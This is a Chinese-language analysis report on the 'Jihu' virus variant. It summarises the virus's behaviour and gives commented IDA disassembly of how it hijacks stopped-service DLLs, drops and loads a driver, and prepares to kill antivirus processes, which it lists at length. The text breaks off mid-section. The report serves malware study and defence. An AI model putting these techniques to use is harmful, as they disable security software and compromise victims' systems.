附件中的病毒为隐藏文件,注意在虚拟机中调试
分析的比较仓促,有一部分行为也没有仔细分析,请大家多多指教哈^_^
一、概述
本文档讲述关于极虎病毒变种的行为、技术细节;
该病毒主要通过互联网和局域网传播,其大小为248,832 字节 ,编写语言不详。运行后先判断自身模块位置,如为0x0040000则认为是exe文件,此时打开指定服务,搜索指定的dll文件,找到合适之后将自身修改成dll路径替换之。如果不为0x0040000则认定自身为dll文件然后破坏安全模式,结束杀毒软件,下载木马,感染指定类型的文件,感染可移动磁盘,攻击局域网用户。
二、行为预览
1) 病毒名称:极虎病毒(又名虎虎生威)
2) 病毒类型:感染型病毒
3) 病毒大小:248,832 字节
4) 传播方式:互联网,局域网,可移动存储介质,网页挂马
5) 相关文件:
a 【极虎病毒】分析报告.doc : 病毒分析报告
b 极虎病毒exe.v : 病毒样本;
c 极虎病毒.idb : 病毒IDA打开文件;
6) 病毒具体行为:
a 获取自身模块地址和0x0040000作比较,不同则判断成exe文件运行。此时将自身读入内存并修改成dll属性,然后查找指定的服务,找到其中停止的服务,并查找对应的dll用自身替换之。
b 当为dll被加载时首先搜寻avp.exe,bdagent.exe进程,如果找到则写入一堆nop跳过之后将其删除。在临时文件夹下释放驱动文件加载后删除。获取自身模块对应的服务将其设置成开机启动。
c 利用驱动干扰和结束杀毒软件,分别向驱动发送IRP吗添加劫持和结束杀软。其中被结束的杀软名有:KVMonXP.kxp.KVSrvXP.exe.avp.exe.avp.exe.avp.exe.RavMonD.exe.RavTask.exe.RsAgent.exe.rsnetsvr.exe.RsTray.exe.ScanFrm.exe.CCenter.exe.kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui.exe.ekrn.exe.ccSvcHst.exe.ccSvcHst.exe.ccSvcHst.exe.Mcagent.exe.mcmscsvc.exe.McNASvc.exe.Mcods.exe.McProxy.exe.Mcshield.exe.mcsysmon.exe.mcvsshld.exe.MpfSrv.exe.McSACore.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.avcenter.exe.UfSeAgnt.exe.TMBMSRV.exe.SfCtlCom.exe.TmProxy.exe.360SoftMgrSvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe.vsserv.exe.MPSVC.exe.MPSVC1.exe.MPSVC2.exe.MPMon.exe.ast.exe.360speedld.exe.360SoftMgrSvc.exe.360tray.exe.修复工具.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxTray.exe.
d 删除指定注册表SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal和SYSTEM\CurrentControlSet\Control\SafeBoot\Network来破坏安全模式。修改host文件。感染文件,其中感染文件类型如下:exe,asp,aspx,asp,htm,html,rar。对exe文件主要是在添加一个.tc节头,然后在末尾写上一串shell代码,对rar文件则首先解压到临时文件夹内,然后感染之再打包压回。其他文件则在末尾写上一串脚本。感染之前跳过系统路径包括WinRAR,WindowsUpdate,Windows NT,Windows Media Player,Outlook Express,NetMeeting,MSN Gaming Zone,Movie Maker
microsoft frontpage,Messenger,Internet Explorer,InstallShield Installation InformationComPlus Applications,Common Files,RECYCLER,System Volume InformationDocuments and Settings,WinNT,WINDOWS。
三、清理方式
由于该病毒破坏安全模式并感染电脑上大部分文件,手动很难清除,故建议采用专杀工具清理。
【以下为正文】
四、正文
.text:00401B7E call $+5
.text:00401B83 mov eax, [esp+2Ch+var_2C] ; 取当前地址
.text:00401B86 mov [ebp+lpAddress], eax
.text:00401B89 pop eax
.text:00401B8A push 1Ch ; size_t
.text:00401B8C push 0 ; int
.text:00401B8E lea eax, [ebp+Buffer]
.text:00401B91 push eax ; void *
.text:00401B92 call memset
.text:00401B97 add esp, 0Ch
.text:00401B9A push 1Ch ; dwLength
.text:00401B9C lea eax, [ebp+Buffer]
.text:00401B9F push eax ; lpBuffer
.text:00401BA0 push [ebp+lpAddress] ; lpAddress
.text:00401BA3 call ds:VirtualQuery
.text:00401BA9 mov eax, [ebp+Buffer.AllocationBase]
.text:00401BAC mov hModule, eax
.text:00401BB1 push 0 ; lpModuleName
.text:00401BB3 call ds:GetModuleHandleA
.text:00401BB9 cmp eax, hModule ; 检查当前地址
.text:00401BBF jnz short DllFile ; 当是Dll文件时跳走
.text:00401BC1 push [ebp+arg_C]
.text:00401BC4 push [ebp+arg_8]
.text:00401BC7 push [ebp+arg_4]
.text:00401BCA push [ebp+arg_0]
text:00401BCD call ExeRun .; 当该文件为exe执行
.text:00401BD2 mov [ebp+var_24], eax
.text:00401BD5 jmp short loc_401BE8
.text:00401BD7 DllFile:
.text:00401BD7 push [ebp+arg_8]
.text:00401BDA push [ebp+arg_4]
.text:00401BDD push [ebp+arg_0]
.text:00401BE0 call DllRun . ; 当是Dll时执行
当该文件为exe文件时首先创建管道\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E,如果成功就尝试从管道中读取数据,如果失败则通过判断错误码,如果是所有管道都在使用中则终止程序。实现过程如下:
.text:0040657E push 0 ; hTemplateFile
.text:00406580 push 0 ; dwFlagsAndAttributes
.text:00406582 push 3 ; dwCreationDisposition
.text:00406584 push 0 ; lpSecurityAttributes
.text:00406586 push 0 ; dwShareMode
.text:00406588 push 0C0000000h ; dwDesiredAccess
.text:0040658D push [ebp+lpFileName] ; lpFileName
.text:00406590 call ds:CreateFileA ; 尝试打开管道"\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A"
.text:00406596 mov [ebp+hObject], eax
.text:00406599 cmp [ebp+hObject], 0FFFFFFFFh
.text:0040659D jnz short loc_4065C7 ; 打开成功跳走
.text:0040659F push 1 ; Buffer
.text:004065A1 lea eax, [ebp+String2]
.text:004065A7 push eax ; lpBuffer
.text:004065A8 call CreateBin ; 打开成功,创建"C:\\DelInfo.bin"文件
.text:004065AD call ds:GetLastError
.text:004065B3 cmp eax, 0E7h ; 错误吗意义:所有的管道范例都在使用中。
.text:004065B8 jnz short Over_0 ; 没有空闲的管道,跳出
.text:004065BA push 0 ; uExitCode
.text:004065BC call ds:ExitProcess ; 管道在使用终止程序
当打开管道成功后跳到这里
=============================================================
.text:004065C7 mov [ebp+Mode], 2 ; 管道模式
.text:004065CE push 0 ; lpCollectDataTimeout
.text:004065D0 push 0 ; lpMaxCollectionCount
.text:004065D2 lea eax, [ebp+Mode] ; PIPE_READMODE_MESSAGE
.text:004065D5 push eax ; lpMode
.text:004065D6 push [ebp+hObject] ; hNamedPipe
.text:004065D9 call ds:SetNamedPipeHandleState ; 设置成读和阻塞模式
.text:004065DF push 0 ; lpOverlapped
.text:004065E1 lea eax, [ebp+NumberOfBytesRead]
.text:004065E4 push eax ; lpNumberOfBytesWritten
.text:004065E5 push 2 ; nNumberOfBytesToWrite
.text:004065E7 push offset byte_40BE6C ; lpBuffer
.text:004065EC push [ebp+hObject] ; hFile
.text:004065EF call ds:WriteFile ; 将DD写入管道中
.text:004065F5 push 0 ; lpOverlapped
.text:004065F7 lea eax, [ebp+NumberOfBytesRead]
.text:004065FA push eax ; lpNumberOfBytesRead
.text:004065FB push 104h ; nNumberOfBytesToRead
.text:00406600 push offset String ; lpBuffer
.text:00406605 push [ebp+hObject] ; hFile
.text:00406608 call ds:ReadFile ; 从管道中读取数据
.text:0040660E push offset String ; lpString
.text:00406613 call ds:lstrlenA
.text:00406619 test eax, eax
.text:0040661B jnz short ReadSucceed ; 从该管道读取数据成功
.text:0040661D push [ebp+hObject] ; hObject
.text:00406620 call ds:CloseHandle
.text:00406626 push 1 ; Buffer
.text:00406628 lea eax, [ebp+String2]
.text:0040662E push eax ; lpBuffer
.text:0040662F call CreateBin
.text:00406634 push 0 ; uExitCode
.text:00406636 call ds:ExitProcess ; 管道读取数据失败终止程序
在管道中读取数据成功后则通过strrchr函数搜索以2E开头的ASCII吗字符串,之后反复打开上面管道,知道找不到文件为止,实现方法如下:
.text:0040666C Next: ; CODE XREF:
.text:0040666C mov eax, [ebp+var_26C]
.text:00406672 inc eax
.text:00406673 mov [ebp+var_26C], eax
.text:00406679 loc_406679:
.text:00406679 cmp [ebp+var_26C], 64h
.text:00406680 jge short Over_1
.text:00406682 push 0 ; hTemplateFile
.text:00406684 push 0 ; dwFlagsAndAttributes
.text:00406686 push 3 ; dwCreationDisposition
.text:00406688 push 0 ; lpSecurityAttributes
.text:0040668A push 0 ; dwShareMode
.text:0040668C push 0C0000000h ; dwDesiredAccess
.text:00406691 push [ebp+lpFileName] ; lpFileName
.text:00406694 call ds:CreateFileA ; 尝试打开"\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A"
.text:0040669A mov [ebp+hObject], eax
.text:0040669D cmp [ebp+hObject], 0FFFFFFFFh
.text:004066A1 jnz short OpenPipeFail
.text:004066A3 call ds:GetLastError
.text:004066A9 cmp eax, 2 ; 错误码:系统找不到指定文件
.text:004066AC jnz short Next_1
.text:004066AE jmp short Over_1 ; 反复打开管道,知道找不到文件后推出
.text:004066B0 Next_1:
.text:004066B0 jmp short GetNext
.text:004066B2 OpenPipeFail:
.text:004066B2 push [ebp+hObject] ; hObject
.text:004066B5 call ds:CloseHandle
.text:004066BB GetNext:
.text:004066BB push 32h ; dwMilliseconds
.text:004066BD call ds:Sleep ; 睡眠32h毫秒
.text:004066C3 jmp short Next
然后获取自身文件名完整路径,申请一块堆内存将自身读入内存并修改成dll属性,实现方法如下:
.text:00401C0B push 104h ; nSize
.text:00401C10 lea eax, [ebp+FileName]
.text:00401C16 push eax ; lpFilename
.text:00401C17 push [ebp+hModule] ; hModule
.text:00401C1A call ds:GetModuleFileNameA
.text:00401C20 and [ebp+var_120], 0
.text:00401C27 jmp short loc_401C36
.text:00401C29 loc_401C29:
.text:00401C29 mov eax, [ebp+var_120]
.text:00401C2F inc eax
.text:00401C30 mov [ebp+var_120], eax
.text:00401C36 loc_401C36:
.text:00401C36 cmp [ebp+var_120], 32h
.text:00401C3D jge short loc_401C70
.text:00401C3F push 0 ; hTemplateFile
.text:00401C41 push 0 ; dwFlagsAndAttributes
.text:00401C43 push 3 ; dwCreationDisposition
.text:00401C45 push 0 ; lpSecurityAttributes
.text:00401C47 push 1 ; dwShareMode
.text:00401C49 push 80000000h ; dwDesiredAccess
.text:00401C4E lea eax, [ebp+FileName] ; 自身文件路径
.text:00401C54 push eax ; lpFileName
.text:00401C55 call ds:CreateFileA ; 创建打开自身的文件句柄
.text:00401C5B mov [ebp+hObject], eax
.text:00401C5E cmp [ebp+hObject], 0FFFFFFFFh
.text:00401C62 jz short loc_401C66 ; 打开失败跳走
.text:00401C64 jmp short loc_401C70
.text:00401C66 loc_401C66:
.text:00401C66 push 64h ; dwMilliseconds
.text:00401C68 call ds:Sleep
.text:00401C6E jmp short loc_401C29 ; 跳回接着读取自身
.text:00401C70 loc_401C70:
.text:00401C70 push 0 ; lpFileSizeHigh
.text:00401C72 push [ebp+hObject] ; hFile
.text:00401C75 call ds:GetFileSize ; 打开成功跳到这里获得文件长度
.text:00401C7B mov [ebp+nNumberOfBytesToRead], eax
.text:00401C7E cmp [ebp+nNumberOfBytesToRead], 0
.text:00401C82 jz short loc_401C8A ; 文件长度为0跳走关闭句柄退出
.text:00401C84 cmp [ebp+nNumberOfBytesToRead], 0FFFFFFFFh
.text:00401C88 jnz short loc_401CA6 ; 文件长度合适,跳走准备内存读取
.text:00401C8A loc_401C8A:
.text:00401C8A push [ebp+hObject] ; hObject
.text:00401C8D call ds:CloseHandle
.text:00401C93 mov eax, [ebp+arg_4]
.text:00401C96 and dword ptr [eax], 0
.text:00401C99 mov eax, [ebp+arg_8]
.text:00401C9C and dword ptr [eax], 0
.text:00401C9F xor eax, eax
.text:00401CA1 jmp locret_401D57
.text:00401CA6 loc_401CA6:
.text:00401CA6 mov eax, [ebp+arg_8]
.text:00401CA9 mov ecx, [ebp+nNumberOfBytesToRead]
.text:00401CAC mov [eax], ecx
.text:00401CAE mov eax, [ebp+nNumberOfBytesToRead]
.text:00401CB1 add eax, 20h
.text:00401CB4 push eax ; unsigned int
.text:00401CB5 call ??2@YAPAXI@Z ; operator new(uint)
.text:00401CBA pop ecx
.text:00401CBB mov [ebp+var_124], eax
.text:00401CC1 mov eax, [ebp+var_124]
.text:00401CC7 mov [ebp+lpBuffer], eax
.text:00401CCD mov eax, [ebp+arg_4]
.text:00401CD0 mov ecx, [ebp+lpBuffer]
.text:00401CD6 mov [eax], ecx
.text:00401CD8 mov eax, [ebp+nNumberOfBytesToRead]
.text:00401CDB add eax, 20h
.text:00401CDE push eax ; size_t
.text:00401CDF push 0 ; int
.text:00401CE1 push [ebp+lpBuffer] ; void *
.text:00401CE7 call memset ; 将申请的内存区域清0
.text:00401CEC add esp, 0Ch
.text:00401CEF push 0 ; lpOverlapped
.text:00401CF1 lea eax, [ebp+NumberOfBytesRead]
.text:00401CF4 push eax ; lpNumberOfBytesRead
.text:00401CF5 push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead
.text:00401CF8 push [ebp+lpBuffer] ; lpBuffer
.text:00401CFE push [ebp+hObject] ; hFile
.text:00401D01 call ds:ReadFile ; 读取自身到指定的内存中
.text:00401D07 push [ebp+hObject] ; hObject
.text:00401D0A call ds:CloseHandle
.text:00401D10 and [ebp+var_10], 0
.text:00401D14 mov eax, [ebp+lpBuffer]
.text:00401D1A mov ecx, [ebp+lpBuffer]
.text:00401D20 add ecx, [eax+3Ch] ; 取该文件DOS头的最后一个成员变量,使ecx定位到NT头
.text:00401D23 mov [ebp+var_10], ecx
.text:00401D26 cmp [ebp+hModule], 0
.text:00401D2A jz short loc_401D41 ; 这里是0代表读取自身
.text:00401D2C mov eax, [ebp+var_10]
.text:00401D2F movzx eax, word ptr [eax+16h]
.text:00401D33 and eax, 0DFFFh .; 修改自身成dll属性
获取临时文件夹路径和系统windows路径,在"sfc_os.dll"中搜索序号为5的函数,如果该dll装载失败则跳走从注册表中读取数据,打开设备管理器循环查看服务,当服务属于停止状态则替换该服务对应的Dll,替换的文件是Dll属性的自身文件,之后跳走退出,不成功则跳回查询下一个。
.text:004020AE push 104h ; uSize
.text:004020B3 lea eax, [ebp+Buffer]
.text:004020B9 push eax ; lpBuffer
.text:004020BA call ds:GetWindowsDirectoryA ; 获取windows系统目录
.text:004020C0 push 104h ; size_t
.text:004020C5 push 0 ; int
.text:004020C7 lea eax, [ebp+TempPath]
.text:004020CD push eax ; void *
.text:004020CE call memset
.text:004020D3 add esp, 0Ch
.text:004020D6 lea eax, [ebp+TempPath]
.text:004020DC push eax ; lpBuffer
.text:004020DD push 104h ; nBufferLength
.text:004020E2 call ds:GetTempPathA ; 获取临时文件夹路径
.text:004020E8 push 0F003Fh ; dwDesiredAccess
.text:004020ED push 0 ; lpDatabaseName
.text:004020EF push 0 ; lpMachineName
.text:004020F1 call ds:OpenSCManagerA ; 打开设备管理器
.text:004020F7 mov [ebp+hSCManager], eax
.text:004020FA push offset LibFileName ; "sfc_os.dll"
.text:004020FF call ds:LoadLibraryA
.text:00402105 mov [ebp+hLibModule], eax
.text:0040210B cmp [ebp+hLibModule], 0
.text:00402112 jnz short GetFunAddNo5 ; Dll装载成功跳走
.text:00402114 jmp GetVauleReg
.text:00402119 jmp GetVauleReg
.text:0040211E GetFunAddNo5:
.text:0040211E push 5 ; lpProcName
.text:00402120 push [ebp+hLibModule] ; hModule
.text:00402126 call ds:GetProcAddress ; 取得序号为5的函数地址
.text:0040212C mov FunNO5sfc_os, eax
text:00402141 NextService:
.text:00402141 mov eax, [ebp+var_B8C]
.text:00402147 inc eax
.text:00402148 mov [ebp+var_B8C], eax
.text:0040214E loc_40214E:
.text:0040214E push [ebp+var_B8C] ; int
.text:00402154 push 0 ; int
.text:00402156 push 40h ; int
.text:00402158 lea eax, [ebp+ServiceName]
.text:0040215E push eax ; lpString1
.text:0040215F call sub_401879 ; 解压服务名称
.text:00402164 cmp eax, 0FFFFFFFFh
.text:00402167 jnz short loc_40218A
.text:00402169 cmp [ebp+var_784], 0
.text:00402170 jnz short loc_402185 ; ; Dll装载失败跳走
.text:00402172 mov [ebp+var_784], 1
.text:0040217C or [ebp+var_B8C], 0FFFFFFFFh
.text:00402183 jmp short NextService
.text:00402185 loc_402185:
.text:00402185 jmp GetVauleReg ; ; Dll装载失败跳走
.text:0040218A loc_40218A:
.text:0040218A push [ebp+var_B8C] ; int
.text:00402190 push 1 ; int
.text:00402192 push 40h ; int
.text:00402194 lea eax, [ebp+String1]
.text:0040219A push eax ; lpString1
.text:0040219B call sub_401879
.text:004021A0 push offset String ; lpString2
.text:004021A5 lea eax, [ebp+String1]
.text:004021AB push eax ; lpString1
.text:004021AC call ds:lstrcmpiA
.text:004021B2 test eax, eax
.text:004021B4 jnz short loc_4021B8
.text:004021B6 jmp short NextService
.text:004021B8 loc_4021B8:
.text:004021B8 push 0F01FFh ; dwDesiredAccess
.text:004021BD lea eax, [ebp+ServiceName]
.text:004021C3 push eax ; lpServiceName
.text:004021C4 push [ebp+hSCManager] ; hSCManager
.text:004021C7 call ds:OpenServiceA
.text:004021CD mov [ebp+hSCObject], eax
.text:004021D3 cmp [ebp+hSCObject], 0
.text:004021DA jnz short OpenSucceed ; 打开服务成功跳走
.text:004021DC jmp NextService
.text:004021E1 OpenSucceed:
.text:004021E1 push 1Ch ; size_t
.text:004021E3 push 0 ; int
.text:004021E5 lea eax, [ebp+ServiceStatus]
.text:004021EB push eax ; void *
.text:004021EC call memset
.text:004021F1 add esp, 0Ch
.text:004021F4 lea eax, [ebp+ServiceStatus]
.text:004021FA push eax ; lpServiceStatus
.text:004021FB push [ebp+hSCObject] ; hService
.text:00402201 call ds:QueryServiceStatus ;查看服务状态
.text:00402207 cmp [ebp+ServiceStatus.dwCurrentState], 1
; SERVICE_STOPPED
.text:0040220E jz short ReplaceDll ; 查看服务停止,跳走
.text:00402210 cmp [ebp+var_784], 0
.text:00402217 jnz short ControlThisService
.text:00402219 jmp CloseThisNext ; 跳走关闭该服务并取下一个值
.text:00402223 ControlThisService:
.text:00402223 lea eax, [ebp+ServiceStatus]
.text:00402229 push eax ; lpServiceStatus
.text:0040222A push 1 ; dwControl
.text:0040222C push [ebp+hSCObject] ; hService
.text:00402232 call ds:ControlService ; 服务没停止则将其停止
.text:00402238 test eax, eax
.text:0040223A jnz short ReplaceDll ; 当服务停止跳走
.text:0040223C jmp CloseThisNext ; 跳走关闭该服务并取下一个值
.text:00402246 ReplaceDll:
.text:00402246 push 104h ; size_t
.text:0040224B push 0 ; int
.text:0040224D lea eax, [ebp+FileName]
.text:00402253 push eax ; void *
.text:00402254 call memset
.text:00402259 add esp, 0Ch
.text:0040225C lea eax, [ebp+String1]
.text:00402262 push eax
.text:00402263 lea eax, [ebp+Buffer]
.text:00402269 push eax
.text:0040226A push offset aSSystem32S_dll ; "%s\\system32\\%s.dll"
.text:0040226F lea eax, [ebp+FileName]
.text:00402275 push eax ; LPSTR
.text:00402276 call ds:wsprintfA ; 设置dll路径,本次调试值为"C:\WINDOWS\system32\appmgmts.dll"
.text:0040227C add esp, 10h
.text:0040227F lea eax, [ebp+FileName]
.text:00402285 push eax ; lpFileName
.text:00402286 call ReplaceDll ; 替换dll并将其创建时间设置成原来创建的时间
; 本次调试值为"C:\WINDOWS\system32\appmgmts.dll"
.text:0040228B test eax, eax
.text:0040228D jnz short GoStarService
.text:00402291 jmp short CloseThisNext ; 跳走关闭该服务并取下一个值
.text:00402293 GoStarService:
.text:00402293 push 0 ; lpServiceArgVectors
.text:00402295 push 0 ; dwNumServiceArgs
.text:00402297 push [ebp+hSCObject] ; hService
.text:0040229D call ds:StartServiceA ; 开启原来关闭的服务
.text:004022A3 test eax, eax
.text:004022A5 jnz short ServiceOver ; 重启服务成功跳走
.text:004022A7 jmp short CloseThisNext ; 跳走关闭该服务并取下一个值
.text:004022A9 jmp short CloseThisNext ; 跳走关闭该服务并取下一个值
.text:004022AB ServiceOver:
.text:004022AB push [ebp+hLibModule] ; hLibModule
.text:004022B1 call ds:FreeLibrary
.text:004022B7 push [ebp+hSCObject] ; hSCObject
.text:004022BD call ds:CloseServiceHandle
.text:004022C3 push [ebp+hSCManager] ; hSCObject
.text:004022C6 call ds:CloseServiceHandle
.text:004022CC cmp dword_40DC3C, 0
.text:004022D3 jz short ExitThisProcess ; 替换结束服务重启成功跳走终止程序
.text:004022D5 mov eax, dword_40DC3C
.text:004022DA mov [ebp+var_C30], eax
.text:004022E0 push [ebp+var_C30] ; void *
.text:004022E6 call ??3@YAXPAX@Z ; operator delete(void *)
.text:004022EB pop ecx
.text:004022EC ExitThisProcess:
.text:004022EC push 0 ; uExitCode
.text:004022EE call ds:ExitProcess
.text:004022F4 CloseThisNext:
.text:004022F4 push [ebp+hSCObject] ; hSCObject
.text:004022FA call ds:CloseServiceHandle
.text:00402300 jmp NextService ; 跳回取下一个值
当数据解压失败或者装载Dll失败则从注册表读取数据
.text:00402305 GetVauleReg: ;
.text:00402305 push 400h ; size_t
.text:0040230A push 0 ; int
.text:0040230C lea eax, [ebp+Data]
.text:00402312 push eax ; void *
.text:00402313 call memset
.text:00402318 add esp, 0Ch
.text:0040231B mov [ebp+cbData], 400h
.text:00402322 lea eax, [ebp+hKey]
.text:00402325 push eax ; phkResult
.text:00402326 push 1 ; samDesired
.text:00402328 push 0 ; ulOptions
.text:0040232A push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
.text:0040232F push 80000002h ; hKey
.text:00402334 call ds:RegOpenKeyExA
.text:0040233A mov dword ptr [ebp+ValueName], 7374656Eh
.text:00402344 mov [ebp+var_77C], 736376h
.text:0040234E lea eax, [ebp+cbData]
.text:00402351 push eax ; lpcbData
.text:00402352 lea eax, [ebp+Data]
.text:00402358 push eax ; lpData
.text:00402359 lea eax, [ebp+Type]
.text:0040235F push eax ; lpType
.text:00402360 push 0 ; lpReserved
.text:00402362 lea eax, [ebp+ValueName]
.text:00402368 push eax ; lpValueName
.text:00402369 push [ebp+hKey] ; hKey
.text:0040236C call ds:RegQueryValueExA ; 从注册表中读取数据
.text:00402372 push [ebp+hKey] ; hKey
.text:00402375 call ds:RegCloseKey
.text:0040237B lea eax, [ebp+Data]
.text:00402381 mov [ebp+lpString], eax ; 从注册表中读取的数据首地址
.text:00402384 GetNext_1:
.text:00402384 mov eax, [ebp+lpString]
.text:00402387 movsx eax, byte ptr [eax]
.text:0040238A test eax, eax
.text:0040238C jz over_1 ; 如果从注册表中读取的数据为0则跳走退出
.text:00402392 push offset String ; lpString2
.text:00402397 push [ebp+lpString] ; lpString1
.text:0040239A call ds:lstrcmpiA
.text:004023A0 test eax, eax
.text:004023A2 jnz short loc_4023A6
.text:004023A4 jmp short GetNext_1
.text:004023A6 loc_4023A6:
.text:004023A6 push 400h ; size_t
.text:004023AB push 0 ; int
.text:004023AD lea eax, [ebp+BinaryPathName]
.text:004023B3 push eax ; void *
.text:004023B4 call memset
.text:004023B9 add esp, 0Ch
.text:004023BC push offset aVcs ; "vcs"
.text:004023C1 push offset aOst_exe ; "ost.exe"
.text:004023C6 push offset aSystemrootSyst
; "%SystemRoot%\\System32\\svch%s -k nets"
.text:004023CB push offset aSS_0 ; "%s%s"
.text:004023D0 lea eax, [ebp+BinaryPathName]
.text:004023D6 push eax ; LPSTR
.text:004023D7 call ds:wsprintfA ; "%SystemRoot%\\System32\\svchost.exe -k nets"
.text:004023DD add esp, 14h
.text:004023E0 push 0 ; lpPassword
.text:004023E2 push 0 ; lpServiceStartName
.text:004023E4 push 0 ; lpDependencies
.text:004023E6 push 0 ; lpdwTagId
.text:004023E8 push 0 ; lpLoadOrderGroup
.text:004023EA lea eax, [ebp+BinaryPathName] ; "%SystemRoot%\\System32\\svchost.exe -k nets"
.text:004023F0 push eax ; lpBinaryPathName
.text:004023F1 push 1 ; dwErrorControl
.text:004023F3 push 2 ; dwStartType
.text:004023F5 push 20h ; dwServiceType
.text:004023F7 push 10h ; dwDesiredAccess
.text:004023F9 push [ebp+lpString] ; lpDisplayName
.text:004023FC push [ebp+lpString] ; lpServiceName
.text:004023FF push [ebp+hSCManager] ; hSCManager
.text:00402402 call ds:CreateServiceA
.text:00402408 mov [ebp+hSCObject], eax
.text:0040240E cmp [ebp+hSCObject], 0
.text:00402415 jz Next_2
.text:0040241B push [ebp+lpString]
.text:0040241E lea eax, [ebp+Buffer]
.text:00402424 push eax
.text:00402425 push offset aSSystem32S_dll ; "%s\\system32\\%s.dll"
.text:0040242A lea eax, [ebp+FileName]
.text:00402430 push eax ; LPSTR
.text:00402431 call ds:wsprintfA
.text:00402437 add esp, 10h
.text:0040243A lea eax, [ebp+FileName]
.text:00402440 push eax ; lpData
.text:00402441 push [ebp+lpString] ; int
.text:00402444 call GetDllName ; 从注册表获取Dll名称
.text:00402449 lea eax, [ebp+FileName]
.text:0040244F push eax ; lpFileName
.text:00402450 call ReplaceDll ; 替换上面提到的Dll
.text:00402455 test eax, eax
.text:00402457 jnz short ReadReplace ; 替换成功跳走启动服务
.text:00402459 jmp short Next_2
.text:0040245B jmp short Next_2
.text:0040245D ReadReplace: ; CODE XREF: ExeRun+42B j
.text:0040245D push 0 ; lpServiceArgVectors
.text:0040245F push 0 ; dwNumServiceArgs
.text:00402461 push [ebp+hSCObject] ; hService
.text:00402467 call ds:StartServiceA
.text:0040246D test eax, eax
.text:0040246F jnz short Over_2 ; 启动你服务成功跳走退出
.text:00402471 jmp short Next_2
.text:00402473 jmp short Next_2
.text:00402475 Over_2:
.text:00402475 push [ebp+hLibModule] ; hLibModule
.text:0040247B call ds:FreeLibrary
.text:00402481 push [ebp+hSCObject] ; hSCObject
.text:00402487 call ds:CloseServiceHandle
.text:0040248D push [ebp+hSCManager] ; hSCObject
.text:00402490 call ds:CloseServiceHandle
.text:00402496 cmp dword_40DC3C, 0
.text:0040249D jz short ExitThisProcess_1
.text:0040249F mov eax, dword_40DC3C
.text:004024A4 mov [ebp+var_C34], eax
.text:004024AA push [ebp+var_C34] ; void *
.text:004024B0 call ??3@YAXPAX@Z ; operator delete(void *)
.text:004024B5 pop ecx
.text:004024B6 ExitThisProcess_1:
.text:004024B6 push 0 ; uExitCode
.text:004024B8 call ds:ExitProcess
.text:004024BE Next_2: ..
.text:004024BE push [ebp+lpString] ; lpString
.text:004024C1 call ds:lstrlenA
.text:004024C7 mov ecx, [ebp+lpString]
.text:004024CA lea eax, [ecx+eax+1]
.text:004024CE mov [ebp+lpString], eax
.text:004024D1 jmp GetNext_1
此时该文件为exe的功能就分析结束了,下面是该程序为dll时的功能:首先通过CreateBin函数内部功能判断当前进程名是不是"booter.exe""CONFIG.exe""boottemp.exe",如果不是则寻找"avp.exe"和"bdagent.exe"进程,这里是通过枚举进程名比较,故不贴出来了。
.text:0040540D push offset aAvp_exe ; "avp.exe"
.text:00405412 call CheckProcess
.text:00405417 test eax, eax
.text:00405419 jnz short GoWriteNop ; 没有找到跳走写入一堆90,然后删除
.text:0040541B push offset aBdagent_exe ; "bdagent.exe"
.text:00405420 call CheckProcess ; 通过枚举进程搜索这两个杀软进程
.text:00405425 test eax, eax
.text:00405427 jz short GoRevertData
.text:00405429 GoWriteNop: ; CODE XREF: MainGN+7C j
.text:00405429 call WriteNop ; 写入一堆90然后删除
接着解压一系列名称如杀软进程名,网络用户名和弱口令,网址名称等,解压完毕后在临时文件夹创建驱动文件"Forter.sys",代码如下:
.text:004054D7 push offset TempPath ; lpBuffer
.text:004054DC push 104h ; nBufferLength
.text:004054E1 call ds:GetTempPathA
.text:004054E7 push 104h ; size_t
.text:004054EC push 0 ; int
.text:004054EE push offset SystemDirector ; void *
.text:004054F3 call memset
.text:004054F8 add esp, 0Ch
.text:004054FB push 104h ; uSize
.text:00405500 push offset SystemDirector ; lpBuffer
.text:00405505 call ds:GetSystemDirectoryA
.text:0040550B push 104h ; size_t
.text:00405510 push 0 ; int
.text:00405512 lea eax, [ebp+FileName]
.text:00405518 push eax ; void *
.text:00405519 call memset
.text:0040551E add esp, 0Ch
.text:00405521 push offset aForter_sys ; "Forter.sys"
.text:00405526 push offset TempPath
.text:0040552B push offset aSS_0 ; "%s%s"
.text:00405530 lea eax, [ebp+FileName]
.text:00405536 push eax
.text:00405537 call [ebp+wsprintfA]
.text:0040553A add esp, 10h
.text:0040553D push 80h ; int
.text:00405542 push 65h ; int
.text:00405544 push hModule ; hModule
.text:0040554A lea eax, [ebp+FileName]
.text:00405550 push eax ; int
.text:00405551 call CallLoadResource ; 在临时文件夹下创建"Forter.sys"
.text:00405556 lea eax, [ebp+FileName]
.text:0040555C push eax ; lpBinaryPathName
.text:0040555D call StartService_1 ; 启动"Forter.sys"服务
.text:00405562 push 400h ; size_t
.text:00405567 push 0 ; int
.text:00405569 lea eax, [ebp+String]
.text:0040556F push eax ; void *
.text:00405570 call memset
.text:00405575 add esp, 0Ch
.text:00405578 push offset DisplayName ; "Forter"
.text:0040557D push off_40B548 ; "SYSTEM\\CurrentControlSet\\Services"
.text:00405583 push offset aSS ; "%s\\%s"
.text:00405588 lea eax, [ebp+String]
.text:0040558E push eax ; LPSTR
.text:0040558F call ds:wsprintfA
.text:00405595 add esp, 10h
.text:00405598 lea eax, [ebp+String]
.text:0040559E push eax
.text:0040559F push 80000002h
.text:004055A4 call [ebp+SHDeleteKeyA] ; 删除SYSTEM\\CurrentControlSet\\Services\\Forter
.text:004055AA lea eax, [ebp+FileName]
.text:004055B0 push eax ; lpFileName
.text:004055B1 call ds:DeleteFileA ; 删除临时文件夹下的"Forter.sys"文件
接下来关闭杀毒软件,杀软进程名:
